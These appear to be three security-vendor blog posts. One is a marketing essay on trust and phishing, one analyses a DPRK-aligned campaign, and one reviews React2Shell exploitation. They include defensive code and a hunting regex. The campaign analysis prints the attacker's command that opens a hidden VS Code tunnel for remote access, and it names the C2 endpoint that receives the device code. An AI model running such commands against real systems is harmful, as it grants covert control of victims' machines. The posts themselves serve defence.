July 18, 2023

Understanding Email Security & the Psychology of Trust

We explore how psychological research into the nature of trust relates to our relationship with technology - and what that means for AI solutions.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research

When security teams discuss the possibility of phishing attacks targeting their organization, the first reaction is often to assume a successful attack is inevitable because of the users. Users are typically referenced in cyber security conversations as organizations’ greatest weaknesses, cited as the cause of many grave cyber-attacks because they click links, open attachments, or approve multi-factor authentication requests without verifying their purpose.

While for many, the weakness of the user may feel like a fact rather than a theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness training. The psychology of trust and the nature of human reliance on technology make preparing users for the exploitation of that trust in technology very difficult – if not impossible.

This Darktrace long read will highlight principles of psychological and sociological research on the nature of trust, the elements of trust that relate to technology, and how the human brain is wired to rely on implicit trust. Together, these principles point to the conclusion that humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to that challenge.

What is the psychology of trust?

Psychological and sociological theories on trust largely centre around the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impacts of trust decisions on interpersonal relationships, and the characteristics which make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability.1

Most of the behavioural evaluations of trust decisions survey why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust require the context that trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts which require the brain to categorize information and determine possible dangers. More broadly, successful trust relationships are essential in maintaining the fabric of human society, critical to every element of human life.

Trust can be compared to dark matter (Rotenberg, 2018), the extensive but often difficult-to-observe material that binds planets and earthly matter. In the same way, trust is an integral but often silent component of human life, connecting people and enabling social functioning.2

Defining implicit and routine trust

As briefly mentioned earlier, dependence is an essential element of the trusting relationship. A routine of trust, based on maintaining rather than repeatedly re-establishing trust, becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust said friend each time one has new experiences.

Active and passive levels of cognition are important to recognize in decision-making, including trust choices. Decision-making is often an active cognitive process requiring significant resources from the brain. However, many decisions occur passively, especially if they are not new choices, e.g. habits or routines. The brain’s focus turns to immediate tasks while relegating habitual choices to subconscious thought processes: passive cognition. Passive cognition leaves the brain open to the effects of inattentional blindness, wherein the individual may be abstractly aware of a choice, but it is not the focus of their thought processes or actively acknowledged as a decision. These levels of cognition are most often discussed as “attention” within the brain’s cognition and processing.3

This is essentially a concept of implicit trust: trust which occurs as a background thought process rather than as active decision-making. Implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choices and lifestyle. Combined with dependence on people and services, this implicit trust creates a haze of cognition in which trust is implied and assumed, rather than actively chosen, across a myriad of scenarios.

Trust and technology

As researchers at the University of Cambridge highlight in their work on trust and technology, ‘In a fundamental sense, all technology depends on trust.’4 The same implicit trust systems which allow us to navigate social interactions by subconsciously choosing to trust also govern our interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.

Most people have a favourite brand of soda. They will routinely purchase that soda and drink it without testing it for chemicals or bacteria and without reading reviews to ensure the producers have not changed their quality standards. This is a representative example of routine trust, wherein the trust choice is made implicit through habitual action: the person is not actively weighing the ramifications of continuing to use and trust the product.

The principle of dependence is especially important in discussions of trust and technology, because the modern human is entirely reliant on technology and so has no way to avoid trusting it.5 This is particularly true in workplace scenarios, where employees are given a mandatory set of technologies, from programs to devices and services, which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between the user and the technology. The key difference between interpersonal trust and technological trust is that deception is often much more difficult to identify.

The implicit trust in workplace technology

To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. The organizations also rely on the employees (users) to use those technologies within the accepted policies and operational guidelines. The employees rely on the organization to determine which products and services are safe or unsafe.

Within this context, implicit trust is occurring at every layer of the organization and its technological holdings, yet the trust choice is often made annually by a small security team rather than continually evaluated. Systems and programs remain in place for years and are used because “that’s the way it’s always been done.” Within that context, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult for a human to identify.

For example, many organizations use email communications to promote software updates for employees. Typically, such an email prompts employees to update to new versions from the vendors directly or from public marketplaces, such as the App Store on Mac or the Microsoft Store on Windows. If that kind of email were impersonated, spoofing an update and including a malicious link or attachment, there would be no reason for the employee to question it, given the implicit trust reinforced through habitual use of that service and program.

Inattentional blindness: How the brain ignores change

Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices made subconsciously. Changes to these technologies are often subject to inattentional blindness, a psychological phenomenon wherein the brain overwrites sensory information with what it expects to see rather than what is actually perceived.

A well-known demonstration of inattentional blindness6 is an experiment that asks individuals to count the number of times a ball is passed between several people. While that is occurring, something else happens in the background which, statistically, most of those tested will not see. The surprise comes afterwards, when the researcher reveals that the background event participants missed was a person in a gorilla suit moving back and forth through the group. This highlights how significant details can be overlooked by the brain and “overwritten” with other sensory information. Applied to technology, inattentional blindness and implicit trust make spotting changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans.

With all this in mind, how can you prepare users to correctly anticipate or identify a violation of that trust when their brains subconsciously make trust decisions and unintentionally ignore cues suggesting a change in behaviour? The short answer: it is difficult, if not impossible.

How threats exploit our implicit trust in technology

Most cyber threats are built around the idea of exploiting the implicit trust humans place in technology. Whether it’s techniques like “living off the land”, wherein programs normally associated with expected activities are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns or scams, many cyber threats are predicated on the exploitation of human trust, rather than simply avoiding technological safeguards and building backdoors into programs.

In the case of phishing, it is easy to see the attempts to leverage users’ trust in technology and services. The most common example is spoofing, one of the tactics most frequently observed by Darktrace/Email. Spoofing mimics a trusted user or service and can be accomplished through a variety of mechanisms, whether the creation of a fake domain meant to mirror a trusted link, or an email account that appears to belong to a Human Resources, Internal Technology, or Security service.

In the case of a falsified internal service, often dubbed a “Fake Support Spoof”, the user is exploited by following instructions from an accepted organizational authority figure and service provider, whose instructions would normally be adhered to. These cases are often difficult to spot from the sender’s address or the text of the email alone, and they become even harder to detect if an account belonging to one of those services is compromised, so that the sender’s address is legitimate and expected for correspondence. Given the context of implicit trust, detecting deception in these cases is extremely difficult.
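One concrete signal behind many spoofs is a sender domain that looks almost, but not exactly, like a trusted one. The sketch below is illustrative only: it compares sender domains against a hypothetical allow-list using edit distance, which catches simple lookalikes (for example “rn” standing in for “m”) but would not, on its own, catch the compromised legitimate account described above. The domain list and distance threshold are assumptions, not how any particular product works.

```python
# Minimal sketch: flag sender domains that closely resemble, but do not match,
# a hypothetical allow-list of trusted domains. Illustrative only; real email
# security products combine many more signals than edit distance.

def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            curr.append(min(prev[j] + 1,                 # deletion
                            curr[j - 1] + 1,             # insertion
                            prev[j - 1] + (ca != cb)))   # substitution
        prev = curr
    return prev[-1]

TRUSTED_DOMAINS = {"darktrace.com", "microsoft.com", "examplecorp.com"}  # assumption

def is_lookalike(sender_domain: str, max_distance: int = 2) -> bool:
    """True if the domain is close to a trusted domain without being one."""
    if sender_domain in TRUSTED_DOMAINS:
        return False
    return any(edit_distance(sender_domain, trusted) <= max_distance
               for trusted in TRUSTED_DOMAINS)

print(is_lookalike("rnicrosoft.com"))  # True: "rn" imitates "m"
print(is_lookalike("microsoft.com"))   # False: exact match is trusted
```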

How email security solutions can solve the problem of implicit trust

How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is by using email security solutions that leverage behavioural analysis via anomaly detection, rather than traditional email gateways.

Expecting humans to identify the exploitation of their own trust is a high-risk, low-reward endeavour, especially when it takes different forms, affects different users or parts of the organization differently, and does not always carry obvious red flags to identify it as suspicious. This is where email security built on anomaly detection becomes the key answer to this evolving problem.

Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams, enabling the identification of departures from the norm, even those designed to mimic expected activity. Anomaly detection mitigates the human cognitive biases that might prevent teams from identifying evolving threats. It may also surface benign anomalous activity, but it ensures that threats, no matter how novel or cleverly packaged, are identified and raised to the human security team.

Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision making and enables the identification of patterns and categorization of information without the framing and biases which allow trust to be leveraged and exploited.

For example, say a cleverly written email is sent from an address that appears to be a Microsoft affiliate, suggesting the user needs to patch their software due to the discovery of a new vulnerability. The sender’s address appears legitimate, and news stories are circulating on major media outlets about a new Microsoft vulnerability causing organizations problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download and takes only a few minutes to install. Whether this email was created by a generative AI service like ChatGPT or written by a person, acting on it would give the threat actor(s) the user’s username and password and, if the software is downloaded, would activate malware on the device and possibly the broader network.

If we rely on users to identify this as unusual, there are many evidence points reinforcing their implicit trust in Microsoft services that make them want to comply with the email rather than question it. By comparison, anomaly detection-driven email security would flag the unusualness of the source: the mail would likely not come from a Microsoft-owned IP address, and the sender would be unusual for an organization that does not normally receive mail from them. The language might indicate solicitation, an attempt to entice the user to act, and the link could be flagged because it contains a hidden redirect or tailored information the user cannot see, whether hidden beneath text like “Click Here” or obscured by link shortening. All of this information is present and discoverable in the phishing email, but it is often invisible to human users because of trust decisions made months or even years ago for known products and services.
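To make the anomaly detection idea concrete, the sketch below is a minimal, illustrative example of unsupervised anomaly detection over per-email metadata: a model is fitted on hypothetical historical features describing normal mail, and the spoofed “Microsoft update” email described above scores as an outlier. The feature choices, values, and library (scikit-learn’s IsolationForest) are assumptions for illustration and do not represent how Darktrace/Email or any specific product works.

```python
# Illustrative sketch only: an unsupervised model learns what "normal" email
# metadata looks like, then scores new mail by how far it departs from that norm.
# Feature choices, values, and thresholds are assumptions.

import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical per-email features:
# [sender seen before (0/1), sending IP matches claimed brand (0/1),
#  link text matches real URL (0/1), uses link shortener (0/1)]
normal_history = np.array([
    [1, 1, 1, 0],
    [1, 1, 1, 0],
    [1, 1, 0, 0],
    [1, 1, 1, 1],
    [0, 1, 1, 0],
] * 40)  # repeat the small sample to mimic a larger corpus of normal mail

model = IsolationForest(contamination=0.01, random_state=0).fit(normal_history)

# The spoofed "Microsoft update" email described above: never-seen sender,
# non-Microsoft IP, mismatched link text, shortened link.
suspicious = np.array([[0, 0, 0, 1]])
print(model.predict(suspicious))        # typically [-1], i.e. flagged as anomalous
print(model.score_samples(suspicious))  # lower score = more anomalous
```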

AI-driven Email Security: The Way Forward

Email security solutions employing anomaly detection are critical weapons for security teams in the fight to stay ahead of evolving threats and increasingly varied kill chains, which grow more complex year on year. The intertwining nature of technology, coupled with massive social reliance on it, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues into an organization. The changing nature of phishing and social engineering made possible by generative AI is just a drop in the ocean of possible threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate attacks that target users and technology by exploiting trust.

References

1. https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx

2. Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.

3. https://www.cognifit.com/gb/attention

4. https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common

5. Tyler, T.R. and Kramer, R.M. (2001). Trust in Organizations: Frontiers of Theory and Research. Thousand Oaks, CA: Sage Publications, pp. 39–49.

6. https://link.springer.com/article/10.1007/s00426-006-0072-4


January 22, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access


Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The decoy HWPX file, titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)”, is dropped in C:\ProgramData and opened for the user. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken them from the government’s website and edited them to appear legitimate.
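When triaging a script like this, a quick first step is often to carve out and decode its embedded Base64 blobs to see what they contain (for example, a decoy document or a follow-on payload). The sketch below is a generic, illustrative approach, assuming the script has already been decoded to plain text; the minimum blob length is an arbitrary threshold, not something taken from this sample.

```python
# Triage sketch: extract and decode long Base64-looking blobs from a script file.
# The 200-character minimum length is an arbitrary assumption to skip short tokens.

import base64
import re
import sys

BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

def extract_blobs(path: str) -> None:
    text = open(path, "r", errors="ignore").read()
    for i, match in enumerate(BASE64_BLOB.finditer(text)):
        try:
            data = base64.b64decode(match.group(0), validate=True)
        except Exception:
            continue  # not valid Base64 after all
        out = f"blob_{i}.bin"
        with open(out, "wb") as f:
            f.write(data)
        print(f"{out}: {len(data)} bytes, first bytes: {data[:4].hex()}")

if __name__ == "__main__":
    extract_blobs(sys.argv[1])
```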

Figure 2: Base64-encoded blob.

The script then downloads the VS Code CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable); a file named out.txt is also created in the same directory.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishing a VS Code tunnel named “bizeugene”.

Figure 3: VS Code tunnel setup.

VS Code tunnels allow users to connect to a remote computer and use Visual Studio Code on it. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advanced Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].
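Defenders can hunt for this behaviour in process-creation telemetry by looking for the VS Code binary being launched with the tunnel subcommand, as in the command shown above. The sketch below is illustrative only: it assumes a JSON-lines export of process events, and the field names (CommandLine, Image, Computer) are assumptions rather than any specific product’s schema. Legitimate developer use of tunnels will also match, so hits need triage rather than automatic blocking.

```python
# Hunting sketch: flag VS Code being launched with the "tunnel" subcommand in
# process-creation telemetry. The JSON-lines input and the "CommandLine",
# "Image", and "Computer" field names are assumptions about the log format.

import json
import re
import sys

TUNNEL_PATTERN = re.compile(r"\bcode(\.exe)?\b.*\btunnel\b", re.IGNORECASE)

def hunt(path: str) -> None:
    with open(path, "r", errors="ignore") as events:
        for line in events:
            try:
                event = json.loads(line)
            except json.JSONDecodeError:
                continue
            cmd = event.get("CommandLine", "")
            if TUNNEL_PATTERN.search(cmd):
                print(f"[!] possible VS Code tunnel: host={event.get('Computer')} "
                      f"image={event.get('Image')} cmd={cmd}")

if __name__ == "__main__":
    hunt(sys.argv[1])
```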

Figure 4: Contents of out.txt.

The file out.txt contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This gives the threat actor interactive access to the system, including VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

Figure 5: GitHub screenshot after the connection is authorized.

The device code, along with the tunnel name “bizeugene”, is sent in a POST request to https://www.yespp.co.kr/common/include/code/out.php, a legitimate South Korean site that has been compromised and is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, South Korean government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATT&CK

T1566.001 - Phishing: Spearphishing Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/


January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly


Introduction

Last month’s disclosure of CVE-2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE-2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction. No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and an exploitable condition.

The activity Darktrace observed during the React2Shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/Next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMRig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark.

Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and its subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. Parent-process telemetry ties the payload execution directly to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.
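One simple way to surface this kind of masquerading on a Linux host is to look for executables named after common system utilities that live outside the standard binary directories. The sketch below is illustrative: the utility list and search root are assumptions, and a real control would also compare file hashes against the known-good binaries rather than relying on names alone.

```python
# Sketch: find executables named after common utilities (e.g. "vim") that live
# outside standard binary directories. Utility list and search root are
# assumptions; real detection would also compare hashes against known-good files.

import os
import stat

COMMON_UTILITIES = {"vim", "vi", "ls", "ps", "curl", "wget", "sshd"}   # assumption
STANDARD_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")

def find_masquerading(root: str = "/home") -> None:
    for dirpath, _dirs, files in os.walk(root):
        if dirpath.startswith(STANDARD_DIRS):
            continue
        for name in files:
            if name in COMMON_UTILITIES:
                path = os.path.join(dirpath, name)
                try:
                    mode = os.stat(path).st_mode
                except OSError:
                    continue
                if mode & stat.S_IXUSR:  # executable by owner
                    print(f"[!] utility-named executable outside system dirs: {path}")

if __name__ == "__main__":
    find_masquerading()
```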

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.
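That inbound/outbound overlap can be checked directly in flow logs: an external address that both sent requests to the web server and now receives persistent callbacks from it is a strong post-exploitation indicator. The sketch below assumes a CSV export of flows with src_ip, dst_ip, and direction columns; those column names are assumptions about the log format, not a specific product’s schema.

```python
# Sketch: flag external IPs that appear both as inbound clients to a web server
# and as destinations of outbound connections from that same server. The CSV
# column names ("src_ip", "dst_ip", "direction") are assumptions about the
# flow-log export format.

import csv
import sys

def find_callback_overlap(path: str) -> None:
    inbound_sources, outbound_destinations = set(), set()
    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            if row["direction"] == "inbound":
                inbound_sources.add(row["src_ip"])
            elif row["direction"] == "outbound":
                outbound_destinations.add(row["dst_ip"])
    for ip in inbound_sources & outbound_destinations:
        print(f"[!] {ip} sent inbound requests and also receives outbound callbacks")

if __name__ == "__main__":
    find_callback_overlap(sys.argv[1])
```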

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was available on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRAT, a previously undocumented Linux implant, highlights the need for organizations that rely on detection rules and signatures to update them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online. The automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflect a mature, well-resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector
